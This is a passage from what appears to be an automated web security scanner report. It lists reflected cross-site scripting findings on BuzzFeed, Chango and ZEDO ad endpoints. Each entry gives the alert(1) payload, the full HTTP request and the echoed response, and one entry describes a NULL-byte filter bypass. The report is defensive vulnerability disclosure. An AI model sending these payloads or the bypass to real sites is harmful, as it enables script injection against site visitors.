Date: Mon, 13 Jun 2011 11:24:15 GMT
Server: lighttpd bf1
Content-Length: 567

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb789e4<script>alert(1)</script>93295794946&wid=1&to=1&u=ugo - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb789e4<script>
...[SNIP]...

4.109. http://ct.buzzfeed.com/wd/UserWidget [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload d39fa<script>alert(1)</script>d7d3318643e was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=ugod39fa<script>alert(1)</script>d7d3318643e&to=1&or=vb&wid=1&cb=1307963919106 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 13 Jun 2011 11:24:14 GMT
Server: lighttpd bf2
Content-Length: 567

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=ugod39fa<script>alert(1)</script>d7d3318643e - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=ugod39fa<script>
...[SNIP]...

4.110. http://d.chango.com/collector/admeldpixel [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 177fe'%3balert(1)//07ba58728ca was submitted in the admeld_adprovider_id parameter. This input was echoed as 177fe';alert(1)//07ba58728ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333177fe'%3balert(1)//07ba58728ca&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "49c4a308dfe65dbd3ac4e7c0af8b7d2a30dd4888"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:46 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:46 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=333177fe';alert(1)//07ba58728ca&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.111. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72cb2'%3balert(1)//4971401eda9 was submitted in the admeld_callback parameter. This input was echoed as 72cb2';alert(1)//4971401eda9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match72cb2'%3balert(1)//4971401eda9 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "98f631aadac39f8db83e9b1ed3f92a6971c57a7c"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:53 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:53 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match72cb2';alert(1)//4971401eda9?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.112. http://d.chango.com/collector/admeldpixel [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the admeld_callback request parameter is copied into the HTML document as plain text between tags. The payload ee556<script>alert(1)</script>f3ee7f5ea64 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=ee556<script>alert(1)</script>f3ee7f5ea64 HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 141
Server: Chango RTB Server
Etag: "31a35ca3fcea637a6e5e79801983bd200a0b22ba"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:23:59 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:23:59 GMT; Path=/
Connection: close

(new Image()).src='ee556<script>alert(1)</script>f3ee7f5ea64?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

4.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25201'%3balert(1)//a92075ae1b6 was submitted in the $ parameter. This input was echoed as 25201';alert(1)//a92075ae1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=25201'%3balert(1)//a92075ae1b6&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:25201';alert(1)//a92075ae1b6;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:49 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:49 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',25201';alert(1)//a92075ae1b6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,25201';alert(1)//a92075ae1b6;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasA
...[SNIP]...

4.114. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ec7"%3balert(1)//f012bdbb2c2 was submitted in the $ parameter. This input was echoed as 60ec7";alert(1)//f012bdbb2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=60ec7"%3balert(1)//f012bdbb2c2&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:60ec7";alert(1)//f012bdbb2c2;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:48 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:48 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',60ec7";alert(1)//f012bdbb2c2';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,60ec7";alert(1)//f012bdbb2c2;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


                                               
...[SNIP]...

4.115. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64836'%3balert(1)//5b6a7cc0c87 was submitted in the q parameter. This input was echoed as 64836';alert(1)//5b6a7cc0c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=64836'%3balert(1)//5b6a7cc0c87&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=69
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:43 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='64836';alert(1)//5b6a7cc0c87';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=64836';alert(1)//5b6a7cc0c87;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd
...[SNIP]...

4.116. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e08a9"%3balert(1)//5adc2ca10e9 was submitted in the q parameter. This input was echoed as e08a9";alert(1)//5adc2ca10e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=e08a9"%3balert(1)//5adc2ca10e9&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=70
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:42 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='e08a9";alert(1)//5adc2ca10e9';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=e08a9";alert(1)//5adc2ca10e9;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;


                                               
...[SNIP]...

4.117. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e72'%3balert(1)//ab02bc723ef was submitted in the $ parameter. This input was echoed as 25e72';alert(1)//ab02bc723ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=25e72'%3balert(1)//ab02bc723ef&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:25e72';alert(1)//ab02bc723ef;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',25e72';alert(1)//ab02bc723ef';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,25e72';alert(1)//ab02bc723ef;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasA
...[SNIP]...

4.118. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77d71"%3balert(1)//149bbdc5fd3 was submitted in the $ parameter. This input was echoed as 77d71";alert(1)//149bbdc5fd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=77d71"%3balert(1)//149bbdc5fd3&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:77d71";alert(1)//149bbdc5fd3;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


